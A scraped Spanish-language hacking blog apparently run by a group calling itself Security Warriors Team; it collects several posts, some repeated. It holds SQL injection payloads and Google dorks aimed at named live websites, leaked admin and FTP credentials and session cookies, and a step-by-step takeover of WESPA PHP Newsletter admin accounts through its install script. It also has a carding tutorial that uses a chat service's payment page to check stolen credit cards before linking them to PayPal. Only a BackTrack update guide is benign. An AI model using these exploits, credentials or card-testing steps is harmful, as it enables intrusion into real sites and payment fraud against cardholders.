# Exploit Title:Desarrollo: Lógico y Creativo
# Google Dork:blogpost.php?id= Desarrollo: Lógico y Creativo
# Date:14.09.2019
# Author: sh3ll0n sewate.net
# Software Link:http://www.logicoycreativo.com/
# Version:2019
# Tested on:linux and windows any os
#credits:Security Warriors Team SWT http://www.facebook.com/groups/279352788763082/
**web https://sh3ll0nc0rp.blogspot.com
descripcion:
blogpost.php?id=sql injection
data: lyc
Oficina2017@
all web panel admin
SHELL0NC0RP
sábado, 14 de septiembre de 2019
martes, 30 de agosto de 2016
Testeando cards live y validas
Ok bueno llevo tiempo sin publicar en mi blog espero que se entienda tratre de ser lo mas especifico posible con capturas de pantalla le pido disculpa ya que estoy desde el movil.
Lo primero que hay que entender que este metodo no es nuevo ya que lo publique hace un par de años creo que en el 2012 o 2013.
Lo primero sera crear una cuenta en
https://tinychat.com
Una vez creada nos iremos a:
El menu luego a upgrade now.
Luego de eso nos saldra para comprar la suscripcion le damos a pro.
Y a pagar por mes luego apretamos el baner donde estan las targeta para que nos lleve a la plataforma de pago.
Y nos saldra lo siguiente donde completen sus datos (los de la targeta obvio)
Luego le damos a payment info y nos saldra para colocar la targeta. De esta forma:
Esta parte es la interesante cuando colocamos los datos al darle al buy nos tira la siguiente captura entenderemos que esa credicard no es valida o ya esta reportada.
Veremos que al costado del numero de la credicard nos tira no valida osea esa flecha indica que no es real.
Si la ceedicard o bin pasa nos colocara una palomita verde como que la credicard es real o ese bin lo es.
Y luego nos redirecciona donde intenta cobrarnos el pago. Si la credicar no tiene fondos o no la aceptan nos saldra de esta forma.
Es cuando deveremos intentar con otra si llega a pasar se podra comprar en shop chinos vincularla a paypal. De hecho paypal tiene casi el mismo sistema solo que al intentar en paypal varias veces te banean aqui no.
Bueno espero que les siva no es mucho pero es algo
Lo primero que hay que entender que este metodo no es nuevo ya que lo publique hace un par de años creo que en el 2012 o 2013.
Lo primero sera crear una cuenta en
https://tinychat.com
Una vez creada nos iremos a:
El menu luego a upgrade now.
Luego de eso nos saldra para comprar la suscripcion le damos a pro.
Y a pagar por mes luego apretamos el baner donde estan las targeta para que nos lleve a la plataforma de pago.
Y nos saldra lo siguiente donde completen sus datos (los de la targeta obvio)
Luego le damos a payment info y nos saldra para colocar la targeta. De esta forma:
Esta parte es la interesante cuando colocamos los datos al darle al buy nos tira la siguiente captura entenderemos que esa credicard no es valida o ya esta reportada.
Veremos que al costado del numero de la credicard nos tira no valida osea esa flecha indica que no es real.
Si la ceedicard o bin pasa nos colocara una palomita verde como que la credicard es real o ese bin lo es.
Y luego nos redirecciona donde intenta cobrarnos el pago. Si la credicar no tiene fondos o no la aceptan nos saldra de esta forma.
Es cuando deveremos intentar con otra si llega a pasar se podra comprar en shop chinos vincularla a paypal. De hecho paypal tiene casi el mismo sistema solo que al intentar en paypal varias veces te banean aqui no.
Bueno espero que les siva no es mucho pero es algo
lunes, 4 de junio de 2012
04/06/2012
indetectables.net vulnerability detected
Era una mañana [4 - de - julio - del - 2012]. Después de un tiempo no suelo hacer daño ni de hacernos famosos, esto está dedicado -= Security Warriors Team =- saludos a todos sus miembros. Nosotros siempre andamos detectando bugs para explotar, y hacer aver que se puede sacar o reportar el error a los webmasters de dichas webs. En este caso , como decía era una mañana, andaba preparando mis herramientas para empezar hacer mis escans y de casualidad en google me encontré con este tema http://www.indetectables.net/index.php?id=2565823 , normal leía y que tenia una lista de paginas webs en un archivo txt y yo suelo guardar url importantes de temas buenos y por casualidad avía copiado la URL de indetectables.net y le di pegar al formulario scans de una tool y empezó muy rápido y no dude en dejarlo hay que corriera y empiece a escanear no ! , el tiempo pasaba despues de 10 minutos mire, ve una bug vamos aver ! : veamos esa linea roja : Indica una vulne y luego vendrán mas !
Revisamos las de mas . la primera vulnerabilidad seria
Nada mas y nada menos que un http:AuthDetect
y en HTTP Credentials encontramos eso que vemos en la imagen - un servidor FTP al aire libre con un user y pass , al principio miraba luego analizando en mas de una vez salio esto que pedimos solucionar a l webmaster de indetectables.
The resource: "http://www.indetectables.net/viewtopic.php" has a user and password in the body.
The offending URL is: "ftp://helijurado:el7ju3si@pwp.etb.net.co/my.gif".
This vulnerability was found in the request with id 275.
Usando un poco nuestro cerebro en esa url
: Creo que saldria una imagen gif de unos monstruos de diferentes caras, y al redireccionar quedaria la URL limpia del servidor FPT que en REALIDAD es un Disco Virtual con total acceso ftp://pwp.etb.net.co user -
helijurado - paw-
el7ju3si
- 1. GIf en pantalla :
- 2 url - ftp :
3- dentro : -
Al parecer se trata de un almcen de imágenes gif .
ok también en el reporte se obtiene :
Accept-encoding: gzip
Accept: */*
Host: www.indetectables.net
Cookie: Indetect_sid=18a318351569d8b448d49c177c0c0025; Indetect_u=1; Indetect_k=; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; c961072f8116c552bd83=1950c08d9fbd0d7b83f8
Referer: http://www.indetectables.net/
Se obtiene un Cookie muy explotable para no alargar mas esto creo que lo admins ya sabrán que hacer. Seguimos ya me iva pero al mirar mas abajo encontramos una de las vulnerabilidades mas Reconocidas y explotables - SQLi - :
Se obtiene está vulnerabilidad e incluyendo un cookie que en sqlmap se arian maravillas, podemos apresiar la url + el clásico method POST y abajo unas variables y mas abajo vemos el código de fuente del login que es el que seria el vulnerable :
1.
POST http://www.indetectables.net/ucp.php?mode=login HTTP/1.1
Accept-encoding: gzip
Accept: */*
Host: www.indetectables.net
Cookie: Indetect_sid=409c237d87da4bfa58ff2d4593eb6c8c; Indetect_u=1; Indetect_k=; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; c961072f8116c552bd83=1950c08d9fbd0d7b83f8
Referer: http://www.indetectables.net/
Content-type: application/x-www-form-urlencoded
C.FUENTE : QUE ES DONDE VEMOS EL ERROR PRODUCIDO Y QUE DES PUES SE COMPRUEBA EN LA WEB YA QUE NOS ARROJARÍA EL ERROR :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Error General</title><style type="text/css">
/* <![CDATA[ */
* { margin: 0; padding: 0; } html { font-size: 100%; height: 100%; margin-bottom: 1px; background-color: #E4EDF0; } body { font-family: "Lucida Grande", Verdana, Helvetica, Arial, sans-serif; color: #536482; background: #E4EDF0; font-size: 62.5%; margin: 0; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } #wrap { padding: 0 20px 15px 20px; min-width: 615px; } #page-header { text-align: right; height: 40px; } #page-footer { clear: both; font-size: 1em; text-align: center; } .panel { margin: 4px 0; background-color: #FFFFFF; border: solid 1px #A9B8C2; } #errorpage #page-header a { font-weight: bold; line-height: 6em; } #errorpage #content { padding: 10px; } #errorpage #content h1 { line-height: 1.2em; margin-bottom: 0; color: #DF075C; } #errorpage #content div { margin-top: 20px; margin-bottom: 5px; border-bottom: 1px solid #CCCCCC; padding-bottom: 5px; color: #333333; font: bold 1.2em "Lucida Grande", Arial, Helvetica, sans-serif; text-decoration: none; line-height: 120%; text-align: left; }
/* ]]> */
</style></head><body id="errorpage"><div id="wrap"> <div id="page-header"> <a href="./">Volver a la página principal</a> </div> <div id="acp"> <div class="panel"> <div id="content"> <h1>Error General</h1> <div>SQL ERROR [ mysqli ]<br /><br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'z"0";}'
AND log_ip = 'XXX.X1.123.XDX'
AND user_id = 1
' at line 5 [1064]<br /><br />Ocurrió un error SQL mientras recuperaba esta página. Por favor contacte con La Administración del Sitio<a href="mailto:indetectables.net@gmail.com"> si el problema persiste.</div><p>Por favor notifique a La Administración del Sitio o webmaster: <a href="mailto:indetectables.net@gmail.com">indetectables.net@gmail.com</a></p> </div> </div> </div> <div id="page-footer"> Powered by <a href="http://www.phpbb.com/">phpBB</a>® Forum Software © phpBB Group </div></div></body></html>
Comprobándolo en la web : http://www.indetectables.net/ucp.php?mode=login
user: d'z"0
pass: d'z"0
ERROR :
[+]Reporte - [4 - de - julio - del - 2012]
[+]indetectables.net vulnerability detected - by SWT
[+] by - system swt
[+] Team : Security Warriors Team - http://www.sewate.net/
[+] Shellon Shelloncorp - Off Cirujano - Cronox - y todos los miembros
[+ ] facebook - Group : https://www.facebook.com/groups/279352788763082/
jueves, 10 de mayo de 2012
creativeworks full injeccion sql bug
# Exploit Title:Creative Works Multiple sql web scripts
# Google Dork:Powered by: Creative Works
# Date:10-05-2012
# Author: sh3ll0n sewate.net
# Software Link:www.creativeworks.com.ec
# Version:2012
# Tested on:linux and windows any os
#credits:Security Warriors Team SWT http://www.facebook.com/groups/279352788763082/
descripcion:
index.php?idiom=sql injection
herramienta sqlmap test bug sql
code inject test: idiom=1 AND (SELECT 2358 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT (CASE WHEN (2358=2358) THEN 1 ELSE 0 END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
ejemplo:
http://www.hotelesecuador.com.ec/index.php?idiom=1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
creditos:cr0n0x de Security Warriors Team SWT
domingo, 4 de marzo de 2012
Actualizar a BackTrack 5 R2!
Actualizar a BackTrack 5 R2!

1.- Instalación para actualizar y mejorar BT5 (R1):
apt-get update
apt-get dist-upgrade
reboot
Se instaló el nuevo kernel y las actualizaciones de la versión R2 oficial. Es necesario reiniciar el sistema para que parta el kernel 3.2.6.2.- OPCIONAL - Una vez reiniciado, pueden cambiar la consola de la pantalla de bienvenida.
fix-splash
reboot
Con el reinicio, deberían ver la consola de la pantalla de bienvenida aparece de color rojo. 3.- Comprobar que se está ejecutando el kernel 3.2.6:
uname -a
Deberían ver algo como "Linux bt 3.2.6 ..." 4.- Ahora pueden instalar cualquiera de las nuevas herramientas que trae BackTrack 5 R2:
apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef
5.- Agragamos un nuevo repositorio de seguridad a /etc/apt/sources.list, y volvemos a actualizar:
echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade
Aquí en todas las preguntas que les hagan pulsen "Enter" y aceptar todos los valores predeterminados.6.- Por último, para que no hayan problemas desactivamos algunos servicios :
/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop
update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove
Y ya está todo listo, ahora tenemos nuestro BackTrack 5 R2 actualizado a la fecha!. En el blog oficial de Bactrack se promete el BT5 R2 en ISO para el 1 de mayo a través de Torrent.
Yo me demoré en total unos 35 min en actualizar. Espero les haya gustado y les sea útil.
Exploit Full path disclosure and Sql Error ONLINE SHOP IGT
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux
----------------
Vulnerability
----------------
Exploit:
======================
http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]
======================
Example:
======================
http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=
Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3
Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux
----------------
Vulnerability
----------------
Exploit:
======================
http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]
======================
Example:
======================
http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=
Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3
Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]
"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install Path"
ok empesemos es muy sencillo
1- Dork: intitle:"News list Administration panel"
intitle:"WESPA PHP Newsletter v3.0"
2- Dirigirse a la url webconwespa.com/newsletter/admin.php
3- Borrar de la url "admin.php" y dirigirse a el PATH /newsletter/install/install1.php y nos imprimira la configuracion
4- En el campo de PASSWD podemos modificarlo por una contraseña nueva.
Config establecida
Config editada
5- una vez hecho estos cambios procedemos a guardar la config "NEXT STAGE" y "FINISH INSTALL".
6- Una vez hecho esto podemos dirigirnos a la pagina de Adm PATH:/newsletter/admin.php o simplemente click en: "Goto the admin page" como se muestra en la imagen, ingresamos los nuevos datos o los que visualizamos anteriormente en la config y ya estariamos dentro!.
y listo de aqui usteds lo que puedan avisar alos dueño de este bug
1- Dork: intitle:"News list Administration panel"
intitle:"WESPA PHP Newsletter v3.0"
2- Dirigirse a la url webconwespa.com/newsletter/admin.php
3- Borrar de la url "admin.php" y dirigirse a el PATH /newsletter/install/install1.php y nos imprimira la configuracion
4- En el campo de PASSWD podemos modificarlo por una contraseña nueva.
Config establecida
Config editada
5- una vez hecho estos cambios procedemos a guardar la config "NEXT STAGE" y "FINISH INSTALL".
6- Una vez hecho esto podemos dirigirnos a la pagina de Adm PATH:/newsletter/admin.php o simplemente click en: "Goto the admin page" como se muestra en la imagen, ingresamos los nuevos datos o los que visualizamos anteriormente en la config y ya estariamos dentro!.
y listo de aqui usteds lo que puedan avisar alos dueño de este bug
Suscribirse a:
Comentarios (Atom)